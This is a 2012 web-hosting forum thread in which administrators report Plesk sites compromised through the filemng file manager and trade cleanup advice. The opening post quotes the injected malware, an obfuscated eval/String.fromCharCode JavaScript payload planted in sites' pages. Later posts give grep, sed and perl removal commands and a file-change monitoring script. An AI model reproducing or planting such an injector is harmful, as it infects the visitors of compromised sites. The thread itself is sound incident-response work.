Security problem with filemng

[galaxy]

Hi,

I've recently had dozens of sites hacked and malware inserted. But what was strange was all the files changed were still owned by the proper owners.

I did find a file that didn't belong named "index.htm" that had the following contents:

filemng: Error occured during /bin/cat command.<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(115,61,34,34,59,116,114,121,123,113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,34,49,50,51,34,43,110,41,59,125,99,97,116,99,104,40,113,119,41,123,104,61,45,48,49,54,47,55,59,116,114,121,123,97,61,112,114,111,116,111,116,121,112,101,59,125,99,97,116,99,104,40,122,120,99,41,123,101,61,119,105,110,100,111,119,91,34,101,34,43,34,118,97,34,43,34,108,34,93,59,110,61,34,50,48,52,46,51,53,49,46,52,52,48,46,52,57,53,46,50,51,50,46,51,49,53,46,52,52,52,46,53,53,48,46,54,52,46,51,51,48,46,52,48,52,46,54,48,48,46,50,51,50,46,50,52,54,46,51,56,56,46,53,53,48,46,50,48,48,46,51,51,51,46,52,51,54,46,51,57,48,46,50,51,52,46,51,50,55,46,51,57,50,46,53,48,53,46,50,50,56,46,49,50,48,46,49,54,52,46,54,49,53,46,50,54,46,51,48,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,52,55,50,46,52,56,53,46,50,50,56,46,57,54,46,52,49,54,46,53,50,53,46,54,52,46,49,56,51,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,50,51,48,46,51,48,51,46,52,48,52,46,53,48,48,46,54,52,46,49,52,49,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,49,54,50,46,49,55,55,46,53,50,46,53,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,50,51,54,46,50,57,49,46,52,53,54,46,49,54,48,46,50,49,54,46,51,51,51,46,49,50,56,46,51,48,53,46,54,52,46,51,52,56,46,52,49,54,46,53,50,53,46,50,51,48,46,49,51,56,46,52,54,48,46,53,48,53,46,50,48,50,46,51,48,48,46,49,50,56,46,49,56,53,46,54,52,46,51,52,56,46,52,49,54,46,53,50,53,46,50,51,48,46,49,51,56,46,51,50,52,46,50,57,53,46,50,54,46,51,48,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,52,55,50,46,52,56,53,46,50,50,56,46,57,54,46,52,54,52,46,53,48,53,46,50,51,48,46,51,52,56,46,49,50,56,46,51,48,53,46,54,52,46,51,52,56,46,52,49,54,46,53,50,53,46,50,51,48,46,49,51,56,46,50,54,48,46,49,54,48,46,56,52,46,57,54,46,52,51,50,46,53,53,53,46,54,52,46,49,51,53,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,49,54,52,46,57,54,46,49,54,56,46,49,54,48,46,50,48,56,46,51,49,53,46,50,51,54,46,54,53,46,50,48,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,51,49,53,46,52,48,56,46,50,48,48,46,50,51,50,46,51,48,51,46,52,54,48,46,53,56,48,46,54,52,46,49,56,54,46,49,50,56,46,50,52,48,46,56,50,46,51,54,57,46,53,50,46,53,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,50,51,50,46,51,49,50,46,52,50,48,46,53,55,53,46,57,50,46,51,52,53,46,52,48,52,46,53,48,53,46,50,48,48,46,57,54,46,50,52,52,46,49,54,48,46,50,51,50,46,51,48,51,46,52,54,48,46,53,56,48,46,49,49,56,46,51,57,46,52,48,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,54,50,53,46,54,52,46,51,48,51,46,52,51,50,46,53,55,53,46,50,48,50,46,57,54,46,52,57,50,46,54,53,46,50,48,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,51,52,56,46,52,49,54,46,53,50,53,46,50,51,48,46,49,51,56,46,52,54,48,46,53,48,53,46,50,48,50,46,51,48,48,46,49,50,56,46,51,48,53,46,54,52,46,51,52,56,46,52,48,52,46,53,55,53,46,50,51,50,46,57,54,46,49,55,50,46,49,54,48,46,50,51,50,46,51,49,50,46,52,50,48,46,53,55,53,46,57,50,46,50,51,49,46,50,51,54,46,54,53,46,50,48,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,51,55,53,46,53,50,46,53,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,50,50,56,46,51,48,51,46,52,54,52,46,53,56,53,46,50,50,56,46,51,51,48,46,49,50,56,46,50,48,48,46,50,51,50,46,51,49,50,46,52,50,48,46,53,55,53,46,57,50,46,51,52,53,46,52,48,52,46,53,48,53,46,50,48,48,46,57,54,46,49,54,56,46,49,54,48,46,50,51,50,46,51,49,50,46,52,50,48,46,53,55,53,46,57,50,46,51,51,51,46,52,52,48,46,53,48,53,46,49,53,56,46,51,53,52,46,52,48,52,46,53,55,48,46,49,53,52,46,49,50,51,46,50,51,54,46,54,53,46,50,48,46,51,55,53,46,53,50,46,53,48,46,50,54,46,51,48,46,52,48,56,46,53,56,53,46,50,50,48,46,50,57,55,46,52,54,52,46,53,50,53,46,50,50,50,46,51,51,48,46,49,50,56,46,52,49,48,46,49,57,52,46,51,51,48,46,52,48,48,46,53,53,53,46,50,49,56,46,50,51,52,46,52,54,56,46,53,52,53,46,49,57,54,46,51,48,51,46,52,53,54,46,51,53,53,46,50,48,50,46,51,51,48,46,52,48,52,46,53,55,48,46,49,57,52,46,51,52,56,46,52,52,52,46,53,55,48,46,56,48,46,51,53,49,46,52,52,48,46,53,50,53,46,50,52,48,46,49,50,51,46,52,57,50,46,54,53,46,50,48,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,51,53,52,46,51,56,56,46,53,55,48,46,54,52,46,51,48,48,46,49,50,56,46,51,48,53,46,54,52,46,51,51,48,46,52,48,52,46,53,57,53,46,54,52,46,50,48,52,46,51,56,56,46,53,56,48,46,50,48,50,46,49,50,48,46,52,54,56,46,53,53,48,46,50,49,48,46,51,54,48,46,49,54,56,46,50,52,53,46,57,54,46,49,52,52,46,49,57,50,46,50,48,53,46,49,49,56,46,51,57,46,52,48,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,53,57,48,46,49,57,52,46,51,52,50,46,49,50,56,46,53,55,53,46,54,52,46,49,56,51,46,49,50,56,46,53,48,48,46,57,50,46,51,48,57,46,52,48,52,46,53,56,48,46,49,52,52,46,51,51,51,46,52,54,56,46,53,55,48,46,50,51,48,46,49,50,48,46,49,54,52,46,49,54,48,46,49,50,52,46,57,54,46,49,57,54,46,50,53,48,46,54,52,46,49,56,57,46,49,50,56,46,50,52,53,46,54,52,46,49,55,52,46,49,50,56,46,50,52,48,46,49,49,56,46,51,57,46,52,48,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,50,51,48,46,51,48,51,46,52,48,52,46,53,48,48,46,54,52,46,49,56,51,46,49,50,56,46,50,53,48,46,49,48,50,46,49,53,54,46,50,49,50,46,50,55,48,46,49,49,48,46,49,54,56,46,50,50,56,46,50,52,48,46,57,56,46,57,54,46,49,55,50,46,49,54,48,46,56,48,46,51,48,48,46,49,56,52,46,53,49,53,46,50,48,50,46,51,52,56,46,51,48,56,46,53,53,53,46,50,50,48,46,51,52,56,46,52,49,54,46,50,48,48,46,56,50,46,57,54,46,49,54,56,46,49,54,48,46,57,54,46,51,54,48,46,50,56,48,46,51,53,48,46,49,52,48,46,50,49,48,46,50,56,48,46,51,53,48,46,56,50,46,57,54,46,49,55,50,46,49,54,48,46,56,48,46,51,48,48,46,49,56,52,46,53,49,53,46,50,48,50,46,51,52,56,46,50,55,50,46,52,56,53,46,50,51,50,46,51,48,51,46,49,54,48,46,50,48,53,46,54,52,46,49,50,54,46,49,50,56,46,50,52,48,46,50,52,48,46,50,49,48,46,50,56,48,46,51,53,48,46,49,52,48,46,49,50,51,46,49,55,50,46,49,54,48,46,56,48,46,50,51,49,46,51,56,56,46,53,56,48,46,50,48,56,46,49,51,56,46,52,53,54,46,53,53,53,46,50,51,52,46,51,51,48,46,52,48,48,46,50,48,48,46,50,51,48,46,57,54,46,49,54,56,46,49,54,48,46,57,54,46,51,54,48,46,50,56,48,46,51,53,48,46,49,52,48,46,49,50,51,46,49,54,52,46,50,57,53,46,50,54,46,51,48,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,52,54,52,46,53,50,48,46,50,49,48,46,51,52,53,46,49,56,52,46,51,50,53,46,54,52,46,49,56,51,46,49,50,56,46,50,54,48,46,49,49,50,46,49,53,48,46,50,50,48,46,50,52,53,46,49,49,56,46,51,57,46,52,48,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,49,53,52,46,57,54,46,50,52,52,46,49,54,48,46,49,48,48,46,49,52,55,46,50,48,56,46,50,55,53,46,49,48,52,46,49,54,56,46,50,4

 

[mikcanavan]

Malicious code injection

Ditto here - lots of different sites, some simple HTML some complex PHP/SQL sites. Maybe something to do with - http://jsunpack.jeek.org ???

Range of files have been modified, all timestamped approx 14:00 GMT 02/July/2012. The only pattern seems to be that it is common file names, eg jquery.js / cycle.js / dropper.js / index.html

Example of the code inserted at the end of the facebook.js file : http://pastebin.com/vfhz1ug1

Would appreciate some feedback from the Plesk team, is this another vulnerability within the control panel?

 

[galaxy]

It looks like they got copies of peoples passwords.

I was looking at /usr/local/psa/admin/logs/httpsd_access_log

and see there's people attacking from all over (so they have a network of compromised hosts attacking) going in and changing files throughout the server and inserting malware on home pages and included javascript pages.

I've spent all day today removing it from hundreds of domains...

I've disabled file manager (renamed the binary/wrapper), but not sure that's going to stop it yet.

 

[mikcanavan]

Yup - I have the same. Apologies Parallels team, compromised Client account, so all domains within client@5 were modified by the attacker.

Changed the clients control panel password, will now keep an eye out for further access attempts.

Info from my log for reference:

124.253.128.166 domain.com:8443 - [02/Jul/2012:14:11:11 +0100] "GET /plesk/client@5/domain@101/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/ HTTP/1.1" 200 85107 "https://domain.com:8443/plesk/client@5/domain@101/hosting/file-manager/edit/?cmd=chdir&file=/httpdocs/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5"

 

[galaxy]

It looks like most if not all of my clients where hacked. And they're going directly to each domains URL to get in. In the log I see each line as:

123.45.67.89 domain1.com:8443 - ...
111.22.33.44 domain2.com:8443 - ...
...

I just renamed "filemng" in the /usr/local/psa/admin/bin directory until there's a fix.

 

[IgorG]

Well. Some time ago we have published KB articles about this SQL injection vulnerability, method for fixing and script for mass password changing. All these actions should prevent negative consequences of this vulnerability. But there are two known problems still remains:

- infected contents was deployed on Plesk server before applying all mentioned protection actions and still working;
- some of users have changed their previous passwords (known for hackers) back after running script for mass password changing;

Now you can determine and remove all infected .js (or something else) scripts with their known markers with something like:

grep –r ‘km0ae9gr6m’ /var/www/vhosts

or

grep –r ‘qhk6sa6g1c’ /var/www/vhosts

And you should apply fix and change passwords with mass password changing script if you still not performed these protection actions.

 

[DiogoR]

Plesk update.

Hi.

I have Plesk 9.3.

Will the update to most up to date plesk solve this issue?

Best Regards.

 

[IgorG]

Hi.

I have Plesk 9.3.

Will the update to most up to date plesk solve this issue?

Best Regards.

Did you read this KB article http://kb.parallels.com/en/113321 ?

 

[DiogoR]

When I did my last post I renamed the filemng file to prevent it's usage and tried to remove all infections I found.

I'm now monitoring if they appear again.

I've gone to the page you instructed, downloaded the "checker" and the result is:

The patch has been successfully applied.

Does this mean I'm safe and can rename back the filemng back to it's original name?

Best Regards.

 

[galaxy]

I had patched the system for the vulnerability, but then recently (a few months ago), upgraded to 9.5.4. I also have a firewall blocking remote SQL on port 3306. They still got in apparently. I needed to stay in the 9.x realm because I have too many people reliant on the Sitebuilder and have been working to keep it and migrate the sitebuilder 4.5 to another VPS.

 

[IgorG]

When I did my last post I renamed the filemng file to prevent it's usage and tried to remove all infections I found.

I'm now monitoring if they appear again.

I've gone to the page you instructed, downloaded the "checker" and the result is:

The patch has been successfully applied.

Does this mean I'm safe and can rename back the filemng back to it's original name?

Best Regards.

Did you change all passwords with corresponding script too?

 

[Squeeb]

our systems have also been plagued by this attack.

It's in jquery's and index.html's all over the servers.

Can you confirm this *is* a vulnerability within the plesk admin section?

 

[Squeeb]

Seems funny that this attack only just happened to everybody aswell.

 

[corncrake]

Ok just registered so I could add to this - exact same hack attempt here.

If its already happened - here's some tips.

Find the files that have been modified in the past day within vhost, try -

find /var/www/vhosts \( -name "*.js" -o -name "*.php" -o -name "index.*" -o -name "default.*" \) -ctime -1

Then if you want to remove the string based on the code shown by the OP at the start you could use (make a backup if your concerned about the replacements effect!) -

find /var/www/vhosts \( -name "*.js" -o -name "*.php" -o -name "index.*" -o -name "default.*" \) -ctime -1 -exec sed -i 's/km0ae9gr6m[^>]*qhk6sa6g1c/youreplacementtexthere/g' {} \;

OK, now that the files are clean check the system again for the injected script -

grep -H km0ae9gr6m /var/www/vhosts/* -R | cut -d: -f1

this will just display the files found with the string used at the start of the injected code.

Hopefully it finds no files

So what else could be done -

Rename the plesk filemanager as mentioned above.

Additionally and to check when next time your files are changed -

Setup a simple cron script to check to let you know when files are modified. I use find again but you could use inotify.

So let's check every 5 min for files that have changed in the last 10 min in vhosts, and send a warning email when this happens (not ideally for servers with 50+ sites but for smaller sets or just to check a specific site, it's good) -

#!/bin/bash
# init
fts=$(find /var/www/vhosts \( -name "*.js" -o -name "*.php" -o -name "index.*" -o -name "default.*" \) -cmin -10)
if [ "$fts" ]; then
echo "$fts" | mail -s "Files where modified $(date +%Y-%m-%d-%r)" [email protected];
else
:
fi

save this as a script and set it up as a cron job to run every 5 min.

Finally, if you feel the VPS is compromised and your are paranoid about further attacks - migrate to a new one

Hope this info is of help and saves some time for others

 

[Squeeb]

Heh,
Nice post

Nice to see us sysadmins thinking alike. Cleaned 100 files so far using the methods above (well, similar methods)

 

[corncrake]

Thanks, any improvements (especially on the sed) let me know, i'm ad-libbing

Another possible point is to see if you can restrict plesk control panel to your ip or at least the port.

 

[Squeeb]

Yea, we've blocked port 8443 (plesk admin) on our PIX and local firewalls (using CSF / LFD)

http://configserver.com/cp/csf.html

 

[HornWijaya]

Here's the perl command line

Got infected
System went for upgrade from 9.5.1 to 9.5.4, 5 hours of downtime due to stupid mail_restore (keep rsync -aq the whatever) (lost a few clients along the way) Alas... problem persists.

grep -R km0ae9gr6m /var/www/vhosts
get the filenames
perl -pi -e 'BEGIN{undef $/;} s/\/\*km0ae9gr6m.*qhk6sa6g1c\*\///smg' FILENAME

I have been running this for days until I gave up (9.5.4 plesk btw), I have just renamed the filemng.

Was in Super old Ensim in FC1 for many many years, and never have such issue and it's even more secure with its super chroot environment.

Hope the command line helps.

Cheers.

 

[SFMAdmin]

Can Parallels confirm if this is a security issue that will be addressed by a micro update?
It seems very strange that (a, this exploit didn't arise until July the 2nd and (b that this has anything to do with the previous exploit.

This looks to me like the micro patches were not affective.

 

[AlexandreS]

Same here, and the fix was already applied (KB 113424):

> php -d safe_mode=0 plesk_remote_vulnerability_checker.php
The patch has been successfully applied.